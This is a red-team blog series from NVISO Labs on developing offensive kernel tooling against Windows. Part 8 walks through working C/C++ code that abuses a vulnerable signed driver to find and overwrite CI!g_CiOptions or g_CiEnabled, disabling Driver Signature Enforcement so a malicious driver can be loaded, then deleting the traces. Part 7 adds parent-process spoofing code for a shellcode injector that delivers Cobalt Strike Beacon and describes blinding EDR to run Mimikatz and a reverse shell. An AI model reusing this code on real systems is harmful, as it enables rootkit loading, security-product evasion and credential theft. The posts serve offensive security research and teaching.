NVISO Labs

Kernel Karnage – Part 8 (Getting Around DSE)

10 January 2022 at 08:00

When life gives you exploits, you turn them into Beacon Object Files.

1. Back to BOFs

I never thought I would say this, but after spending so much time in kernel land, developing kernel functionality almost feels easier than writing user land applications, especially when they need to fly under the radar. As I mentioned in my previous blogpost, I am in dire need of a Beacon Object File (BOF) to disable Driver Signature Enforcement (DSE) from memory. However, a BOF with such complex functionality requires a lot of code and is hard to test and debug, especially when it also uses direct syscalls. So I decided to first write a regular C/C++ console application that does exactly the same thing, minus the integration with CobaltWhispers, which takes care of the payload.

2. May I load drivers, please?

The first task at hand is making sure the current process context we’re in has sufficient privileges to load or unload a driver. By default, even in elevated context, the required privilege SeLoadDriverPrivilege is disabled.

SeLoadDriverPrivilege disabled

Luckily, changing the privileges isn’t too difficult. At boot time, each privilege is assigned a locally unique identifier (LUID). Using the LookupPrivilegeValue() function, the LUID associated with SeLoadDriverPrivilege can be retrieved and passed to NtAdjustPrivilegesToken() together with the SE_PRIVILEGE_ENABLED flag.

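TOKEN_PRIVILEGES tp;
LUID luid;
HANDLE hToken;
NTSTATUS status;

// open the current process token with the right to adjust its privileges
status = NtOpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken);

// resolve the LUID assigned to SeLoadDriverPrivilege
LookupPrivilegeValue(nullptr, L"SeLoadDriverPrivilege", &luid);

tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

// enable the privilege in the token
status = NtAdjustPrivilegesToken(hToken, FALSE, &tp, 0, nullptr, nullptr);

SeLoadDriverPrivilege enabled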

3. Down to business

Once the privileges are sorted, we can move on to the next step, which is creating the necessary registry key and its values. When a driver is loaded using the NtLoadDriver() API, a registry key is passed as a parameter. This registry key is necessary because it contains the location of the driver on disk (this is why we need to touch disk to load a driver), as well as a few other values that indicate the type of driver, how errors are handled when the driver fails to start, and when in the boot sequence the driver should be started.

Creating registry keys is nothing new:

HANDLE hKey;
ULONG disposition;
OBJECT_ATTRIBUTES oa;
UNICODE_STRING keyName;
RtlInitUnicodeString(&keyName, KeyName);

InitializeObjectAttributes(&oa, &keyName, OBJ_CASE_INSENSITIVE, nullptr, nullptr);

NtCreateKey(&hKey, KEY_ALL_ACCESS, &oa, 0, nullptr, REG_OPTION_NON_VOLATILE, &disposition);

UNICODE_STRING keyValueName;
RtlInitUnicodeString(&keyValueName, L"ErrorControl");
DWORD keyValue = SERVICE_ERROR_NORMAL;
NtSetValueKey(hKey, &keyValueName, 0, REG_DWORD, (BYTE*)&keyValue, sizeof(keyValue));

RtlInitUnicodeString(&keyValueName, L"Type");
keyValue = SERVICE_KERNEL_DRIVER;
NtSetValueKey(hKey, &keyValueName, 0, REG_DWORD, (BYTE*)&keyValue, sizeof(keyValue));

RtlInitUnicodeString(&keyValueName, L"Start");
keyValue = SERVICE_DEMAND_START;
NtSetValueKey(hKey, &keyValueName, 0, REG_DWORD, (BYTE*)&keyValue, sizeof(keyValue));

RtlInitUnicodeString(&keyValueName, L"ImagePath");
UNICODE_STRING DriverImagePath;
RtlInitUnicodeString(&DriverImagePath, DriverPath);
NtSetValueKey(hKey, &keyValueName, 0, REG_EXPAND_SZ, (BYTE*)DriverImagePath.Buffer, DriverImagePath.Length + sizeof(UNICODE_NULL));

The registry key has been successfully created and the ImagePath value points to the driver on disk.
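As a rough illustration of what ends up under that key, the following portable sketch (not the code used in this project) collects the four values and computes the byte size of the ImagePath data. The struct and function names are hypothetical, the numeric constants mirror the Windows SDK definitions, and the key path assumes the usual \Registry\Machine\System\CurrentControlSet\Services\<name> location that NtLoadDriver() expects.

```cpp
#include <cstddef>
#include <cstdint>
#include <string>

// Numeric values as defined in the Windows SDK headers.
constexpr std::uint32_t kServiceKernelDriver = 0x1; // SERVICE_KERNEL_DRIVER
constexpr std::uint32_t kServiceDemandStart  = 0x3; // SERVICE_DEMAND_START
constexpr std::uint32_t kServiceErrorNormal  = 0x1; // SERVICE_ERROR_NORMAL

// Hypothetical container for the values written below the service key.
struct DriverServiceEntry {
    std::u16string keyPath;     // registry path handed to NtLoadDriver()
    std::u16string imagePath;   // NT-style path to the driver file on disk
    std::uint32_t type;         // "Type"
    std::uint32_t start;        // "Start"
    std::uint32_t errorControl; // "ErrorControl"
};

// Build the entry for a demand-start kernel driver.
DriverServiceEntry MakeDriverServiceEntry(const std::u16string& serviceName,
                                          const std::u16string& ntImagePath) {
    DriverServiceEntry e;
    e.keyPath = u"\\Registry\\Machine\\System\\CurrentControlSet\\Services\\" + serviceName;
    e.imagePath = ntImagePath;
    e.type = kServiceKernelDriver;
    e.start = kServiceDemandStart;
    e.errorControl = kServiceErrorNormal;
    return e;
}

// Size in bytes of a registry string payload: the UTF-16 characters plus the
// terminating null, matching "Length + sizeof(UNICODE_NULL)" above.
std::size_t RegStringByteSize(const std::u16string& s) {
    return (s.size() + 1) * sizeof(char16_t);
}
```

The size helper makes the off-by-one explicit: UNICODE_STRING.Length excludes the terminator, while the registry data for a string value should include it.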

Driver registry entry

The registry key can then be passed to NtLoadDriver(), which will read the driver from disk and load it into memory. Once the driver is no longer needed, it can be unloaded by passing the same registry key to NtUnloadDriver(). For OPSEC reasons, once the driver is unloaded from the system, the registry key and the binary on disk should also be removed, which is relatively easy with calls to NtOpenKeyEx(), NtDeleteKey() and NtDeleteFile().

NtLoadDriver(&keyName);
//do stuff
NtUnloadDriver(&keyName);

HANDLE hKey;
OBJECT_ATTRIBUTES oa;
InitializeObjectAttributes(&oa, &keyName, OBJ_CASE_INSENSITIVE, nullptr, nullptr);
NtOpenKeyEx(&hKey, DELETE, &oa, 0);
NtDeleteKey(hKey);

InitializeObjectAttributes(&oa, &DriverImagePath, OBJ_CASE_INSENSITIVE, nullptr, nullptr);
NtDeleteFile(&oa);

4. A touch of black magic and a sprinkle of luck

Now that I’m able to load and unload a signed driver, it’s time to figure out how to tackle DSE.

Driver Signature Enforcement is part of Windows Code Integrity (CI). Depending on the Windows build version, its state is stored in ntoskrnl.exe or CI.dll as a global, non-exported variable. Before Windows 8 build 9600, the DSE flag is located in ntoskrnl.exe as nt!g_CiEnabled, a global boolean variable that toggles DSE on or off. In more recent builds, the DSE flag can be found in CI.dll as CI!g_CiOptions, which is a combination of flags (0x0=disabled, 0x6=enabled, 0x8=test mode).

For a more detailed write-up or insight into DSE I recommend A quick insight into Driver Signature Enforcement by @j00ru, Capcom Rootkit Proof-Of-Concept by @FuzzySec and Loading unsigned Windows drivers without reboot by @vikingfr.

In a nutshell, the idea is to (ab)use a vulnerable signed driver with an arbitrary kernel memory read/write exploit, locate either g_CiEnabled or g_CiOptions in kernel memory and use the vulnerable driver to overwrite its value with 0x0, which disables DSE. Once DSE is disabled, the malicious driver can be loaded, after which the original DSE value should be restored as soon as possible, because DSE is protected by PatchGuard. That sounds relatively straightforward, but the hard part is locating g_CiEnabled or g_CiOptions: even though we know where to look, neither variable is exported, so we need to perform offset calculations.
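The "disable, load, restore as soon as possible" sequence maps naturally onto a scope guard. The sketch below is a simplified illustration on simulated memory, not the implementation used in this project: ReadFn, WriteFn and ScopedDseOverride are hypothetical names, and the callbacks merely stand in for whatever read/write primitive the vulnerable driver offers.

```cpp
#include <cstdint>
#include <functional>
#include <utility>

// Hypothetical read/write primitives standing in for the vulnerable driver.
using ReadFn  = std::function<bool(std::uint64_t address, std::uint32_t& value)>;
using WriteFn = std::function<bool(std::uint64_t address, std::uint32_t value)>;

// Scope guard: remembers the original value, writes a temporary one, and
// restores the original on destruction so the patched window stays short.
class ScopedDseOverride {
public:
    ScopedDseOverride(ReadFn read, WriteFn write, std::uint64_t address,
                      std::uint32_t temporary)
        : write_(std::move(write)), address_(address) {
        if (read(address_, original_) && write_(address_, temporary))
            active_ = true;
    }

    ~ScopedDseOverride() {
        if (active_)
            write_(address_, original_); // restore the saved value
    }

    ScopedDseOverride(const ScopedDseOverride&) = delete;
    ScopedDseOverride& operator=(const ScopedDseOverride&) = delete;

    bool active() const { return active_; }
    std::uint32_t original() const { return original_; }

private:
    WriteFn write_;
    std::uint64_t address_;
    std::uint32_t original_ = 0;
    bool active_ = false;
};
```

Tying the restore to the destructor means an early return or exception between the two writes cannot leave the modified value in place.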

Since in theory any vulnerable driver with the ability to read/write kernel memory can be used, I won’t be covering the specifics of my vulnerable driver. I relied heavily on KDU’s source code for the implementation of locating g_CiEnabled / g_CiOptions. A lot of code is copied directly from KDU and slightly modified to support a single vulnerable driver, to use lower-level API calls or direct syscalls, and to be more readable overall.

Starting from the top, I have a function ControlDSE() responsible for toggling the DSE value. This function calls QueryVariable() which returns the address in memory of the DSE variable and then calls the vulnerable driver via the DriverReadVirtualMemory() and DriverWriteVirtualMemory() functions to control the DSE value.

NTSTATUS ControlDSE(HANDLE DeviceHandle, ULONG buildNumber, ULONG DSEValue) {
    NTSTATUS status = STATUS_UNSUCCESSFUL;
    ULONG_PTR variableAddress;
    ULONG flags = 0;

    // locate the address in memory of the DSE variable
    variableAddress = QueryVariable(buildNumber);
    if (variableAddress == 0) // QueryVariable() returns 0 when the variable was not found
        return status;

    // read the current DSE value
    DriverReadVirtualMemory(DeviceHandle, variableAddress, &flags, sizeof(flags));
    if (DSEValue == flags) // current DSE value equals the DSE value we want to set
        return STATUS_SUCCESS;

    // write the new DSE value
    status = DriverWriteVirtualMemory(DeviceHandle, variableAddress, &DSEValue, sizeof(DSEValue));
    if (NT_SUCCESS(status)) {
        // confirm the new DSE value is written to memory
        flags = 0;

        DriverReadVirtualMemory(DeviceHandle, variableAddress, &flags, sizeof(flags));
        if (flags == DSEValue)
            printf("New DSE value set\n");
        else
            printf("Failed to set new DSE value\n");
    }
    return status;
}

To locate the address of the DSE variable in memory, QueryVariable() first retrieves the base address of the loaded module in kernel space. Under the hood, GetModuleBaseByName() uses NtQuerySystemInformation() with the SystemModuleInformation information class to retrieve a list of loaded modules and then performs a basic string comparison until it has found the module it’s looking for. Next, QueryVariable() maps a copy of the module into its own virtual memory, which is later used to calculate offsets, and calls QueryCiEnabled() or QueryCiOptions() respectively depending on the build number.

ULONG_PTR QueryVariable(ULONG buildNumber) {
	NTSTATUS status;
	ULONG loadedImageSize = 0;
	SIZE_T sizeOfImage = 0;
	ULONG_PTR result = 0, imageLoadedBase, kernelAddress = 0;
	const char* moduleNameA = nullptr;
    PCWSTR moduleNameW = nullptr;
	HMODULE mappedImageBase;

	WCHAR szFullModuleName[MAX_PATH * 2];

	if (buildNumber < 9600) { // WIN8
		moduleNameA = "ntoskrnl.exe";
        moduleNameW = L"ntoskrnl.exe";
    }
	else {
		moduleNameA = "CI.dll";
        moduleNameW = L"CI.dll";
    }

    // get the base address of the module loaded in kernel space
	imageLoadedBase = GetModuleBaseByName(moduleNameA, &loadedImageSize);
	if (imageLoadedBase == 0)
		return 0;

	szFullModuleName[0] = 0;
	if (!GetSystemDirectory(szFullModuleName, MAX_PATH))
		return 0;

	wcscat_s(szFullModuleName, MAX_PATH * 2, L"\\");
	wcscat_s(szFullModuleName, MAX_PATH * 2, moduleNameW);

    // map a local copy of the module
	mappedImageBase = LoadLibraryEx(szFullModuleName, nullptr, DONT_RESOLVE_DLL_REFERENCES);
	if (mappedImageBase == nullptr)
		return 0;

    if (buildNumber < 9600) {
        status = QueryImageSize(mappedImageBase, &sizeOfImage);

        if (NT_SUCCESS(status)) {
            // calculate offsets and find g_CiEnabled address
            status = QueryCiEnabled(mappedImageBase, imageLoadedBase, &kernelAddress, sizeOfImage);
        }
    }
    else {
        // calculate offsets and find g_CiOptions address
        status = QueryCiOptions(mappedImageBase, imageLoadedBase, &kernelAddress, buildNumber);
    }

    if (NT_SUCCESS(status)) {
        // verify if the found address is in a valid memory range associated with the loaded module in kernel space
        if (IN_REGION(kernelAddress, imageLoadedBase, loadedImageSize))
            result = kernelAddress;
    }

    FreeLibrary(mappedImageBase);
	return result;
}
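GetModuleBaseByName() and IN_REGION are not shown in this post, so here is a hedged, portable sketch of the two ideas: a case-insensitive file name match over a module list, and a range check on the resolved address. ModuleInfo, FindModuleBase() and InRegion() are hypothetical names, and the module list is a plain vector rather than the buffer returned by NtQuerySystemInformation().

```cpp
#include <algorithm>
#include <cctype>
#include <cstddef>
#include <cstdint>
#include <string>
#include <vector>

// Hypothetical, simplified stand-in for one entry of the loaded-module list.
struct ModuleInfo {
    std::string fullPath;    // e.g. "\\SystemRoot\\system32\\CI.dll"
    std::uint64_t imageBase; // base address in kernel space
    std::uint32_t imageSize; // size of the loaded image in bytes
};

static std::string ToLower(std::string s) {
    std::transform(s.begin(), s.end(), s.begin(),
                   [](unsigned char c) { return static_cast<char>(std::tolower(c)); });
    return s;
}

// Return the base address of the module whose file name matches `name`
// (case-insensitive), or 0 when no such module is in the list.
std::uint64_t FindModuleBase(const std::vector<ModuleInfo>& modules,
                             const std::string& name, std::uint32_t* imageSize) {
    const std::string wanted = ToLower(name);
    for (const ModuleInfo& m : modules) {
        const std::size_t slash = m.fullPath.find_last_of('\\');
        const std::string file =
            (slash == std::string::npos) ? m.fullPath : m.fullPath.substr(slash + 1);
        if (ToLower(file) == wanted) {
            if (imageSize != nullptr)
                *imageSize = m.imageSize;
            return m.imageBase;
        }
    }
    return 0;
}

// Half-open range check in the spirit of IN_REGION: base <= address < base + size.
bool InRegion(std::uint64_t address, std::uint64_t base, std::uint64_t size) {
    return address >= base && (address - base) < size;
}
```

Comparing `address - base` against the size avoids computing `base + size`, which could wrap around for addresses near the top of the address space.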

The QueryCiEnabled() and QueryCiOptions() functions perform the actual black magic of calculating the right offsets using the kernel module and the locally mapped copy. QueryCiOptions() makes use of the Hacker Disassembler Engine 64 (modified to be a single C/C++ header file) to inspect the assembly instructions and calculate the right offset. Once the local address has been calculated and stored in the ptrCode variable, the actual address is calculated by adding it to the kernel module base address and subtracting the base address of the locally mapped copy.

NTSTATUS QueryCiOptions(HMODULE ImageMappedBase, ULONG_PTR ImageLoadedBase, ULONG_PTR* ResolvedAddress, ULONG buildNumber) {
	PBYTE ptrCode = nullptr;
	ULONG offset, k, expectedLength;
	LONG relativeValue = 0;
	ULONG_PTR resolvedAddress = 0;

	hde64s hs;

	*ResolvedAddress = 0ULL;

	ptrCode = (PBYTE)GetProcAddress(ImageMappedBase, (PCHAR)"CiInitialize");
	if (ptrCode == nullptr)
		return STATUS_PROCEDURE_NOT_FOUND;

	RtlSecureZeroMemory(&hs, sizeof(hs));
	offset = 0;

	if (buildNumber < 16299) {
		expectedLength = 5;

		do {
            hde64_disasm(&ptrCode[offset], &hs);
            if (hs.flags & F_ERROR)
                break;

            if (hs.len == expectedLength) { //test if jmp
                // jmp CipInitialize
                if (ptrCode[offset] == 0xE9) {
                    relativeValue = *(PLONG)(ptrCode + offset + 1);
                    break;
                }
            }
            offset += hs.len;
        } while (offset < 256);
	}
	else {
		expectedLength = 3;

		do {
            hde64_disasm(&ptrCode[offset], &hs);
            if (hs.flags & F_ERROR)
                break;

            if (hs.len == expectedLength) {
                // Parameters for the CipInitialize.
                k = CheckInstructionBlock(ptrCode,
                    offset);

                if (k != 0) {
                    expectedLength = 5;
                    hde64_disasm(&ptrCode[k], &hs);
                    if (hs.flags & F_ERROR)
                        break;
                    // call CipInitialize
                    if (hs.len == expectedLength) {
                        if (ptrCode[k] == 0xE8) {
                            offset = k;
                            relativeValue = *(PLONG)(ptrCode + k + 1);
                            break;
                        }
                    }
                }
            }
            offset += hs.len;
        } while (offset < 256);
	}

	if (relativeValue == 0)
		return STATUS_UNSUCCESSFUL;

	ptrCode = ptrCode + offset + hs.len + relativeValue;
	relativeValue = 0;
	offset = 0;
	expectedLength = 6;

	do {
        hde64_disasm(&ptrCode[offset], &hs);
        if (hs.flags & F_ERROR)
            break;

        if (hs.len == expectedLength) { //test if mov
            if (*(PUSHORT)(ptrCode + offset) == 0x0d89) {
                relativeValue = *(PLONG)(ptrCode + offset + 2);
                break;
            }
        }
        offset += hs.len;
    } while (offset < 256);

	if (relativeValue == 0)
		return STATUS_UNSUCCESSFUL;

	ptrCode = ptrCode + offset + hs.len + relativeValue;
    // calculate the actual address in kernel space by adding the local
    // address to the kernel module base address and subtracting
    // the base address of the locally mapped copy
	resolvedAddress = ImageLoadedBase + ptrCode - (PBYTE)ImageMappedBase;

	*ResolvedAddress = resolvedAddress;
	return STATUS_SUCCESS;
}
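The address arithmetic in QueryCiOptions() boils down to two rules: a relative jmp, call or RIP-relative mov refers to "address of the next instruction plus a signed 32-bit displacement", and an offset inside the local copy is the same offset inside the kernel image. The following portable sketch works on image offsets instead of raw pointers; the helper names are made up for this example.

```cpp
#include <cstddef>
#include <cstdint>

// Decode a little-endian signed 32-bit displacement from a byte buffer.
std::int32_t ReadRel32(const std::uint8_t* p) {
    const std::uint32_t raw = std::uint32_t(p[0]) | (std::uint32_t(p[1]) << 8) |
                              (std::uint32_t(p[2]) << 16) | (std::uint32_t(p[3]) << 24);
    return static_cast<std::int32_t>(raw);
}

// Image offset that a relative instruction refers to: the offset of the
// next instruction (instrOffset + instrLength) plus the displacement.
std::size_t ResolveRelative(std::size_t instrOffset, std::size_t instrLength,
                            std::int32_t rel32) {
    const std::int64_t next = static_cast<std::int64_t>(instrOffset + instrLength);
    return static_cast<std::size_t>(next + rel32);
}

// Translate an offset in the locally mapped copy into a kernel address.
// This equals ImageLoadedBase + ptrCode - ImageMappedBase in the code above.
std::uint64_t ToKernelAddress(std::uint64_t loadedBase, std::size_t offsetInImage) {
    return loadedBase + offsetInImage;
}
```

For example, a 5-byte `E9` jmp at offset 0x10 with displacement 0x2B lands at offset 0x40, and a 6-byte `89 0D` mov at offset 0x40 with displacement 0xBA refers to offset 0x100.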

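QueryCiEnabled() scans the mapped image for the hardcoded value 0x1D8806EB, which in memory is the byte sequence EB 06 88 1D (a short jmp followed by the opcode bytes of a RIP-relative mov). The 32-bit displacement that follows the signature is relative to the end of that instruction, 8 bytes past the start of the match, and is used to resolve the address.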

NTSTATUS QueryCiEnabled(HMODULE ImageMappedBase, ULONG_PTR ImageLoadedBase, ULONG_PTR* ResolvedAddress, SIZE_T SizeOfImage) {
	NTSTATUS status = STATUS_UNSUCCESSFUL;
	SIZE_T c;
	LONG rel = 0;

	*ResolvedAddress = 0;

	// each candidate needs 8 readable bytes: 4 signature bytes plus a 4-byte displacement
	for (c = 0; c + 2 * sizeof(DWORD) <= SizeOfImage; c++) {
		if (*(PDWORD)((PBYTE)ImageMappedBase + c) == 0x1d8806eb) {
			rel = *(PLONG)((PBYTE)ImageMappedBase + c + 4);
			*ResolvedAddress = ImageLoadedBase + c + 8 + rel;
			status = STATUS_SUCCESS;
			break;
		}
	}
	return status;
}
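To experiment with the signature scan without a kernel image at hand, the same logic can be exercised on a synthetic buffer. This is a portable sketch under stated assumptions: FindCiEnabledOffset() is a hypothetical name, it works on image offsets rather than kernel addresses, and unlike the function above it rejects a displacement that points outside the buffer.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>

// Scan `image` for the bytes EB 06 88 1D followed by a 32-bit displacement.
// On success, store the image offset the displacement refers to and return true.
bool FindCiEnabledOffset(const std::uint8_t* image, std::size_t size,
                         std::size_t* targetOffset) {
    static const std::uint8_t kSignature[4] = {0xEB, 0x06, 0x88, 0x1D};
    const std::size_t needed = sizeof(kSignature) + 4; // signature + displacement

    for (std::size_t c = 0; c + needed <= size; ++c) {
        if (std::memcmp(image + c, kSignature, sizeof(kSignature)) != 0)
            continue;

        // decode the little-endian displacement that follows the signature
        const std::uint8_t* p = image + c + sizeof(kSignature);
        const std::uint32_t raw = std::uint32_t(p[0]) | (std::uint32_t(p[1]) << 8) |
                                  (std::uint32_t(p[2]) << 16) | (std::uint32_t(p[3]) << 24);

        // the displacement is relative to the end of the matched instruction
        const std::int64_t target =
            static_cast<std::int64_t>(c + needed) + static_cast<std::int32_t>(raw);
        if (target < 0 || static_cast<std::uint64_t>(target) >= size)
            return false;

        *targetOffset = static_cast<std::size_t>(target);
        return true;
    }
    return false;
}
```

Writing the loop condition as `c + needed <= size` keeps every read inside the buffer and avoids the unsigned underflow that `size - needed` would cause for very small inputs.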

5. Conclusion

Programmatically loading drivers has its challenges, but it goes to show that if you’re willing to mess around in memory a bit, Windows security components can be bypassed with relative ease. A lot of existing research and exploits are already out there and Microsoft has put in little effort to mitigate them or update existing functionality like Code Integrity to be better protected against attacks. Even if additional patches have fixed certain issues, chaining different exploits together still gets the job done.

I’m still busy investigating the exact workings of QueryCiEnabled() and QueryCiOptions() as I would like to remove dependencies on hardcoded offsets or external libraries/tools like Hacker Disassembler Engine 64. Once this process is complete, I can move on to optimizing code for OPSEC purposes, for example implementing direct syscalls as much as possible, and then convert the final result to a Beacon Object File for Cobalt Strike.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Kernel Karnage – Part 7 (Out of the Lab and Back to Reality)

20 December 2021 at 13:49

This week I emerge from the lab and put on a different hat.

1. Switching hats

With Interceptor being successful in blinding $vendor2 sufficiently to run a meterpreter reverse shell, it is time to put on the red team hat and get out of the perfect lab environment. To do just that, I had to revert some settings I turned off at the beginning of this series.

First, I enabled Secure Boot and disabled test signing mode on the target VM. Secure Boot will enable Microsoft’s Driver Signature Enforcement (DSE) policy, which blocks non-WHQL-signed drivers, including my Interceptor driver, from being loaded. It’s important to note that I left Hypervisor-protected Code Integrity (HVCI) turned off, because I currently have no way of defeating virtualization-based protection.

With the target configured, I then set up a Cobalt Strike Teamserver using a Gmail Malleable C2 profile and configured my EarlyBird shellcode injector to deliver an HTTPS Beacon. My idea was to simulate a scenario where an attacker (me) had managed to gain a foothold on the target and obtained an implant with elevated privileges. The attacker would then use the implant to disable DSE on the compromised system and load the Interceptor driver, all directly in memory to keep a low footprint. Once Interceptor has been loaded on the target system, it would cripple the EDR/AV product and allow the attacker to run Mimikatz undetected.

Naturally, nothing ever goes as planned.

2. Outspoofing myself

The first issue I ran into was executing my shellcode injector with elevated privileges. No matter what I tried, I couldn’t seem to get a Beacon callback with elevated privileges, so I took my issue to infosec Twitter and unmasked the culprit with the help of @trickster012.

The code responsible for spawning the new spoofed process, into which the Beacon payload is then injected, looks like this:

PROCESS_INFORMATION Spawn(LPSTR procPath, HANDLE parentHandle)
{
    //do dynamic imports
    hK32 = GetModuleHandleA("kernel32");
    FARPROC fpInitializeProcThreadAttributeList = GetProcAddress(hK32, "InitializeProcThreadAttributeList");
    _InitializeProcThreadAttributeList InitializeProcThreadAttributeList = (_InitializeProcThreadAttributeList)fpInitializeProcThreadAttributeList;
    FARPROC fpUpdateProcThreadAttribute = GetProcAddress(hK32, "UpdateProcThreadAttribute");
    _UpdateProcThreadAttribute UpdateProcThreadAttribute = (_UpdateProcThreadAttribute)fpUpdateProcThreadAttribute;
    FARPROC fpDeleteProcThreadAttributeList = GetProcAddress(hK32, "DeleteProcThreadAttributeList");
    _DeleteProcThreadAttributeList DeleteProcThreadAttributeList = (_DeleteProcThreadAttributeList)fpDeleteProcThreadAttributeList;

    STARTUPINFOEXA si;
    PROCESS_INFORMATION pi;
    SIZE_T attributeSize;

    memset(&si, 0, sizeof(si));
    memset(&pi, 0, sizeof(pi));

    InitializeProcThreadAttributeList(NULL, 2, 0, &attributeSize);
    si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attributeSize);
    InitializeProcThreadAttributeList(si.lpAttributeList, 2, 0, &attributeSize);

    DWORD64 policy = PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON;
    //enable CIG
    UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, &policy, sizeof(DWORD64), NULL, NULL);
    //PPID spoof: set parentHandle as parent process
    UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &parentHandle, sizeof(HANDLE), NULL, NULL);

    si.StartupInfo.cb = sizeof(si);
    si.StartupInfo.dwFlags = EXTENDED_STARTUPINFO_PRESENT;

    if (!CreateProcessA(NULL, procPath, NULL, NULL, TRUE, CREATE_SUSPENDED | CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si.StartupInfo, &pi))
    {
        throw "";
    }

    std::cout << "Process created!" << " PID: " << pi.dwProcessId << "\n";

    DeleteProcThreadAttributeList(si.lpAttributeList);
    NtClose(parentHandle);

    return pi;
}

The Spawn() function takes a parameter HANDLE parentHandle, which is used to set the parent process of the newly created process. The handle would in this case point to explorer.exe as this is the process I was spoofing. @CaptMeelo recently posted a great blogpost titled Picky PPID Spoofing which covers the topic of PPID spoofing quite well.

To make a long story short, as stated in the Microsoft documentation, the to-be-created process inherits certain attributes from its parent process (the one we’re spoofing), and this happens to include the process token. Among the many things contained in a token are the privileges held by the user, or the user’s groups, associated with the process.

Parent process attributes

If we take a look at explorer.exe in Process Hacker we can see the associated user and token. We can also see that the process is not running in elevated context. Taking into consideration the attribute inheritance, it makes sense that I couldn’t manage to spawn an elevated process with explorer.exe set as parent.

Explorer.exe process hacker

With this issue identified and remediated, I ran head first into the next one: concealing Beacon from EDR/AV. My shellcode injector is still configured to use embedded shellcode, instead of pulling a payload from somewhere else. So far this has worked quite well, using stageless payloads. I replaced the meterpreter payload with one of Cobalt Strike’s stagers, which would then pull a full HTTPS Beacon payload. I have not (yet) modified Beacon, so once the stager pulls the payload, EDR/AV detects a Cobalt Strike artifact in memory and takes action. Uh oh, not good. As of writing this blogpost, I have not yet figured out the answer to this problem. If you have any suggestions, you’re more than welcome to share them with me on Twitter.

3. Disabling Driver Signature Enforcement (DSE)

Instead, I decided to move on to the task at hand: disabling Driver Signature Enforcement (DSE) on the target and loading Interceptor. Over the course of my research I stumbled across Kernel Driver Utility (KDU), a tool developed by @hfiref0x. One of the many wondrous things this tool can do is disable DSE. It does this by loading a WHQL-signed driver with an arbitrary kernel memory read/write vulnerability to change the state of ntoskrnl.exe g_CiEnabled or CI.dll g_CiOptions, depending on the build version of Windows.

I tested KDU and it worked well, except it didn’t tick all the boxes required for the scenario:

  1. It got flagged by EDR/AV
  2. It cannot be executed in memory from a Beacon

What I need is a custom Beacon Object File (BOF) whose only purpose is to disable DSE and load Interceptor, or any other malicious driver for that matter. Windows provides APIs like NtLoadDriver() and NtUnloadDriver() to handle loading drivers programmatically; there’s just one catch: drivers cannot be loaded from memory, they need to touch disk, which is not good for OPSEC. To be fair, this statement is not 100% correct, because there are ways to manually map drivers into memory. However, they come with a lot of drawbacks, like:

  • Invalid DeviceObject and RegistryPath objects
  • No Structured Exception Handling (SEH)
  • Cannot be unloaded, so they persist until reboot
  • Only ntoskrnl.exe imports are resolved
  • Cannot use certain kernel primitives like callbacks because of PatchGuard

I won’t go into much detail here, but manual mapping comes with so much overhead and instability that it is out of the equation (until I get bored). So instead, I’ll have to sacrifice some OPSEC and touch disk for a safer and more stable result. I’m currently developing a BOF to disable DSE using CVE-2015-2291, which will also be integrated in my CobaltWhispers framework for Cobalt Strike. I just updated CobaltWhispers to use SysWhispers2 and InlineWhispers2 to dynamically resolve direct syscalls.

Disable DSE

4. Conclusion

With the release of this blogpost, the kernel driver Interceptor is nearly complete in functionality and is able to fulfill its purpose. Tools aren’t very useful if they don’t work outside of a lab environment, and not all of us have magical access to code signing certificates and administrator privileges in a target environment. I spent a good amount of time uncovering new and different hurdles that come with the scenario I presented, and subsequently tried to find solutions to them. I guess it goes to show that most challenges to remaining undetected and bypassing EDR/AV are still found in user space and have to be addressed as such.

Besides the challenges in user space, there are still several kernel space aspects I want to look at in upcoming blogposts if the time permits. These include:

  • disabling Sysmon and Event Tracing for Windows (ETW)
  • hooking minifilters
  • inspecting and filtering IRPs

But as with everything, time flies by when one’s having fun 😉

Kernel Karnage – Part 6 (Last Call)

9 December 2021 at 13:04

With the release of this blogpost, we’re past the halfway point of my internship; time flies when you’re having fun.

1. Introduction – Status Report

In the course of these 6 weeks, I’ve covered several aspects of kernel drivers and EDR/AV kernel mechanisms. I started off strong by examining kernel callbacks and why EDR/AV products use them extensively to gain visibility into what’s happening on the system. I confirmed these concepts by leveraging existing work against $vendor1 and successfully executing Mimikatz on the compromised system.

Then I took a step back and did a deep dive into the inner structure and workings of a kernel driver, how it communicates with other drivers and applications, and how I can intercept these communications using IRP MajorFunction hooks.

Once I had the basics sorted and got comfortable working with the kernel and a kernel debugger, I started developing my own driver called Interceptor, which has kernel callback patching and IRP MajorFunction hooking capabilities. I took the driver for a test drive against $vendor2 and concluded that attacking an EDR/AV product from kernel land alone is not sufficient and user land detection techniques should be taken into consideration as well.

To solve this problem, I then developed a custom shellcode injector using the EarlyBird technique, which combined with the Interceptor driver was able to partially bypass $vendor2 and launch a meterpreter session on the compromised system.

After this small success, I spent a good amount of time on code maintenance, refactoring, bug fixing and research, which has brought me to today’s blogpost. In this blogpost I would like to wrap up the topic of kernel callbacks, having solved my issues with registry and object callbacks, revisit the shellcode injector in a bit more detail and once more bring the fight to $vendor2. Let’s get to it, shall we?

2. Last call

Having covered process, thread and image callbacks in the previous blogposts, I think it’s only fair if we conclude this topic with registry and object callbacks. In the previous blogpost, I demonstrated how we can retrieve and enumerate the registry callback doubly linked list. The code to patch and subsequently restore these callbacks is almost identical, using the same iteration method. For the sake of simplicity, I decided to store the patched callbacks internally in an array of size 64, instead of another linked list.

